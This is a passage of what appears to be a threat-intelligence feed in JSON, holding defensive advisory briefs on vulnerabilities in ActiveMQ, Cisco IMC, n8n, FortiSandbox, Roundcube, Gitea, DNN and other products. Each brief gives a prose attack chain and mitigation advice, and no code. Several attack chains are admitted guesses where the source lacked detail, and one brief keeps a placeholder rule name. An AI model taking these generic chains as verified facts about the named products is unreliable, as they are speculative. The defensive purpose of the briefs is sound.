Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial Access: The attacker gains valid credentials to access the ActiveMQ management console or API, potentially through credential stuffing, phishing, or exploiting other vulnerabilities.\u003c/li\u003e\n\u003cli\u003eAuthentication: The attacker authenticates to the ActiveMQ instance using the compromised credentials.\u003c/li\u003e\n\u003cli\u003eVulnerability Exploitation (RCE): The attacker exploits a deserialization or other RCE vulnerability to inject malicious code into the ActiveMQ server. 
This may involve crafting a specific message or request to trigger the vulnerability.\u003c/li\u003e\n\u003cli\u003eCode Execution: The injected code executes within the context of the ActiveMQ server process, granting the attacker control over the system.\u003c/li\u003e\n\u003cli\u003ePrivilege Escalation (if necessary): The attacker attempts to escalate privileges to gain root or system-level access, depending on the initial privileges of the ActiveMQ process.\u003c/li\u003e\n\u003cli\u003eLateral Movement: The attacker uses the compromised ActiveMQ server as a pivot point to move laterally within the network, targeting other systems and resources.\u003c/li\u003e\n\u003cli\u003eVulnerability Exploitation (XSS): Simultaneously or independently, the attacker exploits an XSS vulnerability within the ActiveMQ web console. This may involve injecting malicious JavaScript code into the console.\u003c/li\u003e\n\u003cli\u003eImpact: The attacker deploys ransomware, exfiltrates sensitive data, or disrupts critical services, depending on their objectives. The XSS vulnerability allows the attacker to steal administrator cookies or inject further malicious content.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities could lead to complete compromise of the ActiveMQ server, potentially affecting all connected systems and applications. The lack of specifics makes it difficult to determine the exact number of potential victims; however, given the widespread use of ActiveMQ in enterprise environments, the impact could be significant. Consequences include data breaches, service disruption, financial loss, and reputational damage. 
The combination of RCE and XSS vulnerabilities allows attackers to pursue a wide range of malicious objectives, from data theft to system destruction.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eIdentify all Apache ActiveMQ instances within your environment and determine their versions.\u003c/li\u003e\n\u003cli\u003eConsult the Apache ActiveMQ security advisories to identify specific vulnerabilities affecting your versions and apply the necessary patches.\u003c/li\u003e\n\u003cli\u003eImplement strong authentication and authorization controls to restrict access to the ActiveMQ management console and API.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect potential exploitation attempts against ActiveMQ instances.\u003c/li\u003e\n\u003cli\u003eReview and harden the ActiveMQ configuration to minimize the attack surface and reduce the risk of exploitation.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the impact of a successful compromise of an ActiveMQ instance.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-24T09:09:10Z","date_published":"2026-04-24T09:09:10Z","id":"/briefs/2026-04-activemq-rce-xss/","summary":"An authenticated remote attacker can exploit multiple vulnerabilities in Apache ActiveMQ to execute arbitrary program code or perform cross-site scripting attacks.","title":"Apache ActiveMQ Vulnerabilities Allow RCE and XSS","url":"https://feed.craftedsignal.io/briefs/2026-04-activemq-rce-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":6.1,"id":"CVE-2026-20085"},{"cvss":4.8,"id":"CVE-2026-20087"},{"cvss":4.8,"id":"CVE-2026-20088"},{"cvss":4.8,"id":"CVE-2026-20089"},{"cvss":4.8,"id":"CVE-2026-20090"}],"_cs_exploited":false,"_cs_products":["Integrated Management Controller"],"_cs_severities":["medium"],"_cs_tags":["xss","cisco","cimc","vulnerability"],"_cs_type":"advisory","_cs_vendors":["Cisco"],"content_html":"\u003cp\u003eMultiple cross-site 
scripting (XSS) vulnerabilities have been identified in the web-based management interface of the Cisco Integrated Management Controller (IMC). Successful exploitation of these vulnerabilities could allow a remote attacker to inject malicious scripts into the web browser of a user accessing the IMC interface. This could lead to session hijacking, sensitive information disclosure, or other malicious activities performed in the context of the user\u0026rsquo;s session. The vulnerabilities were disclosed on 2026-04-22, and Cisco has released software updates to address them. There are no known workarounds. This threat is relevant for organizations using Cisco IMC to manage their infrastructure.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable Cisco IMC web interface.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious URL containing a JavaScript payload designed to execute in the context of a victim\u0026rsquo;s browser session.\u003c/li\u003e\n\u003cli\u003eAttacker delivers the malicious URL to the victim, typically through phishing, social engineering, or by injecting it into a trusted website.\u003c/li\u003e\n\u003cli\u003eVictim clicks on the malicious URL, or the URL is automatically loaded through a compromised website.\u003c/li\u003e\n\u003cli\u003eThe victim\u0026rsquo;s web browser sends an HTTP request to the vulnerable Cisco IMC web server.\u003c/li\u003e\n\u003cli\u003eThe Cisco IMC web server reflects the attacker\u0026rsquo;s malicious JavaScript payload in the HTTP response without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe victim\u0026rsquo;s web browser executes the malicious JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s JavaScript code executes within the victim\u0026rsquo;s browser, allowing the attacker to steal cookies, redirect the user, or perform other actions on behalf of the 
victim.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these XSS vulnerabilities could allow an attacker to execute arbitrary JavaScript code in the context of a user\u0026rsquo;s session. This could lead to sensitive information disclosure, such as the theft of session cookies, allowing the attacker to hijack the user\u0026rsquo;s session and gain unauthorized access to the Cisco IMC. The attacker could also redirect the user to a malicious website or deface the IMC web interface. While the specific number of vulnerable systems is unknown, organizations using Cisco IMC are potentially at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply the software updates released by Cisco to address the vulnerabilities (CVE-2026-20085, CVE-2026-20087, CVE-2026-20088, CVE-2026-20089, CVE-2026-20090).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule provided below to detect potential exploitation attempts against the Cisco IMC web interface.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious HTTP requests containing potentially malicious JavaScript payloads targeting the Cisco IMC web interface.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-23T12:00:00Z","date_published":"2026-04-23T12:00:00Z","id":"/briefs/2026-04-cisco-imc-xss/","summary":"Multiple cross-site scripting (XSS) vulnerabilities in the web-based management interface of Cisco Integrated Management Controller (IMC) could allow a remote attacker to conduct an XSS attack against a user of the interface.","title":"Cisco Integrated Management Controller (IMC) Multiple XSS 
Vulnerabilities","url":"https://feed.craftedsignal.io/briefs/2026-04-cisco-imc-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.5,"id":"CVE-2026-39974"}],"_cs_exploited":false,"_cs_products":["n8n"],"_cs_severities":["critical"],"_cs_tags":["n8n","vulnerability","sqli","xss","rce","session-hijacking"],"_cs_type":"advisory","_cs_vendors":["n8n"],"content_html":"\u003cp\u003eMultiple vulnerabilities have been identified in n8n, a workflow automation tool. An attacker exploiting these vulnerabilities could achieve a range of malicious outcomes, including remote code execution, security bypass, information disclosure, SQL injection, denial-of-service, cross-site scripting (XSS), malicious redirection, and session hijacking. The vulnerabilities stem from insufficient input validation, insecure configurations, or design flaws within the n8n application. Successful exploitation can lead to complete compromise of the n8n instance and potentially the underlying system, depending on the permissions of the n8n process. This poses a significant risk to organizations relying on n8n for critical business processes. 
Defenders need to implement robust security measures to mitigate these risks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003cp\u003eGiven the broad range of potential vulnerabilities, a generalized attack chain is outlined below:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eReconnaissance:\u003c/strong\u003e The attacker identifies a vulnerable n8n instance, potentially through Shodan or similar tools.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eVulnerability Identification:\u003c/strong\u003e The attacker probes the n8n instance to identify specific exploitable vulnerabilities, such as those related to SQL injection or XSS.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExploitation (SQL Injection):\u003c/strong\u003e The attacker crafts malicious SQL queries through user input fields or API calls to extract sensitive data from the n8n database, such as user credentials or API keys.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExploitation (XSS):\u003c/strong\u003e The attacker injects malicious JavaScript code into n8n workflows or data fields. When other users interact with the affected workflows or data, the JavaScript code executes in their browsers.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrivilege Escalation/Lateral Movement:\u003c/strong\u003e The attacker leverages the compromised credentials or XSS vulnerabilities to gain elevated privileges within the n8n instance or move laterally to other systems within the network.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRemote Code Execution:\u003c/strong\u003e The attacker exploits a vulnerability that allows for the execution of arbitrary code on the server. 
This could be achieved through insecure file uploads, deserialization flaws, or command injection.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePersistence:\u003c/strong\u003e The attacker establishes persistence by creating new n8n workflows or modifying existing ones to execute malicious code on a recurring basis.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eImpact:\u003c/strong\u003e The attacker exfiltrates sensitive data, disrupts critical business processes by manipulating or deleting workflows, or uses the compromised system as a foothold for further attacks within the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities could result in significant damage, depending on the attacker\u0026rsquo;s objectives. The potential impact includes data breaches, financial losses, service disruptions, and reputational damage. If sensitive data is exfiltrated, it could be used for identity theft, fraud, or other malicious purposes. Disruption of critical workflows can lead to business downtime and lost productivity. 
The lack of specific victim counts or sector targeting in the source data makes it difficult to quantify the impact precisely, but the broad range of potential vulnerabilities and their potential consequences warrant immediate attention.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement the provided Sigma rules to detect potential exploitation attempts targeting n8n instances (see \u0026ldquo;Descriptive Detection Rule Name\u0026rdquo; in the \u003ccode\u003erules\u003c/code\u003e section).\u003c/li\u003e\n\u003cli\u003eConduct regular security audits and penetration testing of n8n instances to identify and remediate vulnerabilities before they can be exploited.\u003c/li\u003e\n\u003cli\u003eEnforce strict input validation and sanitization measures to prevent SQL injection and XSS attacks.\u003c/li\u003e\n\u003cli\u003eApply the principle of least privilege to limit the permissions of the n8n process and users.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for suspicious activity related to n8n instances, such as unusual API calls or connections to malicious domains.\u003c/li\u003e\n\u003cli\u003eRegularly review and update n8n workflows to ensure they are secure and do not contain any malicious code.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-23T10:23:56Z","date_published":"2026-04-23T10:23:56Z","id":"/briefs/2026-04-n8n-multiple-vulnerabilities/","summary":"Multiple vulnerabilities in n8n can be exploited by an attacker to execute arbitrary code, bypass security measures, disclose sensitive information, conduct SQL injection attacks, cause denial-of-service, perform cross-site scripting, redirect users, or hijack sessions.","title":"Multiple Vulnerabilities in n8n Workflow Automation 
Tool","url":"https://feed.craftedsignal.io/briefs/2026-04-n8n-multiple-vulnerabilities/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["fortinet","fortisandbox","vulnerability","xss","code-execution"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eFortinet FortiSandbox is susceptible to multiple vulnerabilities that could allow a malicious actor to compromise the system. While the specific CVEs and affected versions are not detailed in the source, the vulnerabilities enable a range of attacks including Cross-Site Scripting (XSS), information disclosure, security bypass, and ultimately, arbitrary code execution. Successful exploitation could allow attackers to gain unauthorized access, steal sensitive data, or disrupt services. Defenders should promptly investigate and patch their FortiSandbox deployments.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003cp\u003eGiven the general nature of the vulnerabilities, a likely attack chain could involve the following steps:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eReconnaissance:\u003c/strong\u003e Attacker identifies a vulnerable FortiSandbox instance exposed to the network.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eXSS Exploitation:\u003c/strong\u003e Attacker crafts a malicious request containing XSS payload targeting a FortiSandbox web interface.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eInformation Disclosure:\u003c/strong\u003e Attacker leverages an information disclosure vulnerability to leak sensitive configuration data or credentials.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSecurity Bypass:\u003c/strong\u003e Attacker circumvents security controls or authentication mechanisms due to a flaw in the FortiSandbox.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCode Execution:\u003c/strong\u003e Attacker exploits a code execution vulnerability to inject and 
execute arbitrary commands on the system.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrivilege Escalation:\u003c/strong\u003e If necessary, the attacker escalates privileges to gain root or administrator access.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement:\u003c/strong\u003e The attacker uses the compromised FortiSandbox as a pivot point to move laterally within the network.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eImpact:\u003c/strong\u003e Depending on the attacker\u0026rsquo;s objectives, the final impact may include data exfiltration, system disruption, or further compromise of internal systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities could lead to complete compromise of the FortiSandbox appliance, potentially impacting network security monitoring and incident response capabilities. An attacker could gain unauthorized access to sensitive data, disrupt security services, or use the compromised FortiSandbox as a launchpad for further attacks within the network. 
The impact is significant due to the FortiSandbox\u0026rsquo;s role in analyzing and mitigating threats.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInvestigate Fortinet\u0026rsquo;s official security advisories for FortiSandbox to identify specific CVEs and affected versions related to these vulnerabilities.\u003c/li\u003e\n\u003cli\u003eApply any available patches or workarounds provided by Fortinet to mitigate the identified vulnerabilities.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs on the FortiSandbox for suspicious activity, such as unusual HTTP requests or attempts to access sensitive files (reference: webserver log source in Sigma rules).\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the potential impact of a compromised FortiSandbox instance (reference: network_connection log source).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM and tune for your environment to detect exploitation attempts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-21T10:00:00Z","date_published":"2026-04-21T10:00:00Z","id":"/briefs/2026-04-fortinet-fortisandbox-vulns/","summary":"Multiple vulnerabilities in Fortinet FortiSandbox allow attackers to perform cross-site scripting attacks, disclose information, bypass security measures, and execute arbitrary code, potentially leading to system compromise.","title":"Multiple Vulnerabilities in Fortinet FortiSandbox","url":"https://feed.craftedsignal.io/briefs/2026-04-fortinet-fortisandbox-vulns/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["roundcube","vulnerability","xss","file-manipulation"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eRoundcube is a widely used, open-source webmail solution. The BSI advisory highlights multiple vulnerabilities within Roundcube that can be exploited by an attacker. 
These vulnerabilities allow for file manipulation, security bypass, cross-site scripting (XSS) attacks, and information disclosure. While the specific versions affected are not detailed, administrators are urged to investigate and apply necessary patches. Successful exploitation could lead to unauthorized access to sensitive email data, compromise of user accounts, and potential further attacks within the affected infrastructure. The advisory was published on 2026-04-21, emphasizing the timeliness of the threat.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Roundcube instance through scanning or reconnaissance.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages a file manipulation vulnerability to upload a malicious file (e.g., a PHP script) to a Roundcube-accessible directory.\u003c/li\u003e\n\u003cli\u003eThe attacker bypasses security measures implemented within Roundcube to prevent unauthorized file access or execution.\u003c/li\u003e\n\u003cli\u003eThe attacker exploits a cross-site scripting (XSS) vulnerability by injecting malicious JavaScript code into a Roundcube page.\u003c/li\u003e\n\u003cli\u003eA legitimate user accesses the compromised page, triggering the injected JavaScript.\u003c/li\u003e\n\u003cli\u003eThe malicious JavaScript executes in the user\u0026rsquo;s browser, potentially stealing cookies or redirecting the user to a phishing site.\u003c/li\u003e\n\u003cli\u003eThe attacker exploits an information disclosure vulnerability to gain access to sensitive information such as user credentials or internal system details.\u003c/li\u003e\n\u003cli\u003eUsing the gathered information, the attacker elevates privileges or gains unauthorized access to other systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these Roundcube vulnerabilities could lead to a range of damaging 
outcomes. Attackers could gain unauthorized access to sensitive email communications, potentially exposing confidential business information or personal data. Compromised user accounts could be used for further attacks, such as sending phishing emails or gaining access to other internal systems. XSS attacks could lead to credential theft and account takeover. Information disclosure could reveal sensitive system details, aiding in further exploitation. The number of affected organizations is currently unknown, but any organization using a vulnerable Roundcube instance is at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInspect Roundcube webserver logs for suspicious file uploads and access attempts, focusing on unusual file extensions or directory traversals. Use the \u003ccode\u003eRoundcube File Upload\u003c/code\u003e Sigma rule as a starting point.\u003c/li\u003e\n\u003cli\u003eImplement a Web Application Firewall (WAF) to filter malicious requests and prevent XSS attacks.\u003c/li\u003e\n\u003cli\u003eMonitor Roundcube logs for unusual activity, such as unexpected access to sensitive files or directories.\u003c/li\u003e\n\u003cli\u003eReview and harden Roundcube\u0026rsquo;s security configuration, including disabling unnecessary features and enforcing strong password policies.\u003c/li\u003e\n\u003cli\u003eDeploy the \u003ccode\u003eRoundcube XSS Attempt\u003c/code\u003e Sigma rule to detect potential cross-site scripting attacks targeting Roundcube.\u003c/li\u003e\n\u003cli\u003eEnable verbose logging for the web server hosting Roundcube to capture detailed information about requests and responses.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-21T08:06:54Z","date_published":"2026-04-21T08:06:54Z","id":"/briefs/2026-04-roundcube-vulns/","summary":"Multiple vulnerabilities in Roundcube allow an attacker to manipulate files, bypass security measures, perform cross-site 
scripting attacks, and disclose information.","title":"Multiple Vulnerabilities in Roundcube","url":"https://feed.craftedsignal.io/briefs/2026-04-roundcube-vulns/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["langflow","vulnerability","xss","file-manipulation","information-disclosure"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eLangflow is affected by multiple vulnerabilities that could allow attackers to perform malicious actions. While specific details such as CVEs and exploited versions are not provided, the identified vulnerabilities enable attackers to manipulate files, potentially leading to data corruption or unauthorized modifications. The disclosure of sensitive information is another significant risk, potentially exposing credentials or other confidential data. Finally, the possibility of Cross-Site Scripting (XSS) attacks could allow attackers to inject malicious scripts into the Langflow application, affecting user sessions and potentially leading to account compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a Langflow instance running a vulnerable version.\u003c/li\u003e\n\u003cli\u003eAttacker exploits a file manipulation vulnerability to modify application files.\u003c/li\u003e\n\u003cli\u003eMalicious code injected alters application behavior.\u003c/li\u003e\n\u003cli\u003eAttacker exploits a separate vulnerability to access sensitive configuration files.\u003c/li\u003e\n\u003cli\u003eAttacker gains access to credentials or API keys.\u003c/li\u003e\n\u003cli\u003eAttacker leverages XSS vulnerability to inject malicious JavaScript into a Langflow page.\u003c/li\u003e\n\u003cli\u003eVictim visits the compromised page, executing the attacker\u0026rsquo;s script.\u003c/li\u003e\n\u003cli\u003eAttacker steals user session cookies or redirects the victim to a phishing 
site.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities could result in unauthorized file modifications, leading to application malfunction or data corruption. Sensitive information disclosure can lead to compromised credentials, allowing attackers to gain further access to systems and data. Cross-site scripting can lead to user account compromise, data theft, and further propagation of the attack. The number of affected Langflow instances is currently unknown.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious activity related to file access and modification, focusing on unusual file paths or unexpected HTTP methods (see rule: \u0026ldquo;Langflow Suspicious File Access\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eImplement strict input validation and output encoding to mitigate the risk of Cross-Site Scripting (XSS) attacks (see rule: \u0026ldquo;Langflow Potential XSS Attempt\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eRegularly review and update Langflow installations to the latest versions to patch potential vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-20T10:38:57Z","date_published":"2026-04-20T10:38:57Z","id":"/briefs/2026-04-langflow-vulns/","summary":"Multiple vulnerabilities in Langflow allow an attacker to manipulate files, disclose sensitive information, or conduct cross-site scripting attacks.","title":"Langflow Multiple Vulnerabilities","url":"https://feed.craftedsignal.io/briefs/2026-04-langflow-vulns/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["gitea","vulnerability","xss"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eMultiple vulnerabilities have been identified in Gitea, a self-hosted Git service. 
These vulnerabilities could be exploited by an attacker to achieve information disclosure, bypass security precautions implemented within the application, and execute cross-site scripting (XSS) attacks. Successful exploitation of these vulnerabilities could lead to unauthorized access to sensitive information stored within Gitea repositories, modification of code, or the execution of malicious scripts in the context of other users. The advisory was published on 2026-04-20.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable Gitea instance exposed to the internet.\u003c/li\u003e\n\u003cli\u003eAttacker leverages an information disclosure vulnerability to obtain sensitive data, such as internal configuration details or user information.\u003c/li\u003e\n\u003cli\u003eThe attacker exploits a security bypass vulnerability to circumvent authentication or authorization mechanisms.\u003c/li\u003e\n\u003cli\u003eAttacker gains unauthorized access to a repository.\u003c/li\u003e\n\u003cli\u003eThe attacker injects malicious JavaScript code into a Gitea page or repository via a cross-site scripting vulnerability.\u003c/li\u003e\n\u003cli\u003eA legitimate user visits the compromised page or interacts with the malicious code within the repository.\u003c/li\u003e\n\u003cli\u003eThe malicious JavaScript executes in the user\u0026rsquo;s browser, allowing the attacker to steal cookies, session tokens, or other sensitive information.\u003c/li\u003e\n\u003cli\u003eAttacker uses stolen credentials to further compromise the Gitea instance or related systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe exploitation of these vulnerabilities in Gitea could lead to the disclosure of sensitive information, such as source code, configuration files, and user credentials. 
The bypass of security measures could grant unauthorized access to repositories, allowing attackers to modify code or introduce malicious backdoors. Cross-site scripting attacks could compromise user accounts and lead to further attacks on other systems. The impact varies depending on the specific vulnerabilities exploited and the sensitivity of the data stored within the Gitea instance.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious Gitea HTTP Requests\u003c/code\u003e to your web server logs to identify potential exploitation attempts (log source: webserver).\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for unusual HTTP requests targeting Gitea instances, specifically looking for indicators of information disclosure or security bypass attempts (log source: webserver).\u003c/li\u003e\n\u003cli\u003eImplement a web application firewall (WAF) with rules to block known Gitea exploits and common XSS attack patterns.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-20T10:29:08Z","date_published":"2026-04-20T10:29:08Z","id":"/briefs/2026-04-gitea-vulns/","summary":"Multiple vulnerabilities in Gitea could allow an attacker to disclose information, bypass security measures, and perform cross-site scripting attacks.","title":"Multiple Vulnerabilities in Gitea","url":"https://feed.craftedsignal.io/briefs/2026-04-gitea-vulns/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8,"id":"CVE-2026-40321"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["dnn","dotnetnuke","svg","xss","cve-2026-40321","upload"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eDNN (formerly DotNetNuke) is an open-source web content management system (CMS) built on the .NET framework. Prior to version 10.2.2, a stored cross-site scripting (XSS) vulnerability exists due to insufficient sanitization of SVG files. 
Attackers can exploit CVE-2026-40321 by uploading a crafted SVG file containing malicious JavaScript. This script can then be executed in the context of other users, including administrators, upon accessing the uploaded SVG. Successful exploitation could lead to session hijacking, account takeover, and potentially arbitrary code execution on the server. Version 10.2.2 addresses this vulnerability by implementing proper sanitization of SVG uploads. The vulnerability affects both authenticated and unauthenticated users, increasing the attack surface.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a DNN instance running a version prior to 10.2.2.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious SVG file containing embedded JavaScript code designed to perform actions such as stealing cookies or redirecting users.\u003c/li\u003e\n\u003cli\u003eThe attacker uploads the malicious SVG file to the DNN instance, potentially through a media library or profile picture upload feature.\u003c/li\u003e\n\u003cli\u003eA user (either authenticated or unauthenticated) views the page or element where the malicious SVG is displayed.\u003c/li\u003e\n\u003cli\u003eThe user\u0026rsquo;s browser executes the embedded JavaScript code within the SVG file.\u003c/li\u003e\n\u003cli\u003eThe malicious script steals the user\u0026rsquo;s session cookie or redirects them to a phishing page.\u003c/li\u003e\n\u003cli\u003eIf the compromised user has administrative privileges, the attacker uses the stolen cookie to access the DNN administration panel.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages their administrative access to inject malicious code into the DNN website or install a backdoor for persistent access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability (CVE-2026-40321) can lead to a range of 
negative consequences. Attackers can hijack user sessions, potentially gaining unauthorized access to sensitive data and administrative functions. An attacker can deface the website, inject malware, or steal sensitive information. Because DNN is often used in enterprise environments, this could lead to significant data breaches and reputational damage. The number of affected installations is potentially high, given the widespread use of DNN.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade DNN installations to version 10.2.2 or later to patch CVE-2026-40321, as recommended by the vendor.\u003c/li\u003e\n\u003cli\u003eImplement the \u0026ldquo;Detect Suspicious SVG Uploads\u0026rdquo; Sigma rule to identify attempts to upload SVG files containing potentially malicious script content.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for HTTP requests that upload or fetch \u0026ldquo;.svg\u0026rdquo; files and, where a reverse proxy or WAF records request bodies (standard access logs do not), inspect those bodies for \u0026lt;script\u0026gt; elements, on* event-handler attributes, or javascript: URIs, using the \u0026ldquo;Web Server Suspicious SVG Upload\u0026rdquo; Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement strict input validation and sanitization for all file uploads, especially SVG files, to prevent the injection of malicious code; as defence in depth, serve user-uploaded SVGs with a Content-Disposition: attachment header or from a separate origin so that any embedded script cannot run in the application\u0026rsquo;s origin.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-18T12:00:00Z","date_published":"2026-04-18T12:00:00Z","id":"/briefs/2026-04-dnn-svg-upload/","summary":"DNN (formerly DotNetNuke) before 10.2.2 is vulnerable to stored cross-site scripting (XSS) via malicious SVG file uploads, potentially leading to account takeover and arbitrary code execution.","title":"DNN (DotNetNuke) SVG Upload Vulnerability 
(CVE-2026-40321)","url":"https://feed.craftedsignal.io/briefs/2026-04-dnn-svg-upload/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.5,"id":"CVE-2026-40286"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["xss","web-application","cve-2026-40286"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eWeGIA, a web manager for charitable institutions, is vulnerable to Stored Cross-Site Scripting (XSS) in versions prior to 3.6.10. The vulnerability, identified as CVE-2026-40286, resides in the \u0026lsquo;Member Registration\u0026rsquo; function, specifically the \u0026lsquo;Member Name\u0026rsquo; field. Attackers can inject malicious JavaScript code into this field. Because the input is neither validated nor encoded, the injected script is stored in the application database. Any user who views the profile containing it has the script executed in their browser. This can lead to session hijacking, credential theft, or defacement. WeGIA version 3.6.10 addresses this vulnerability by implementing proper input sanitization. 
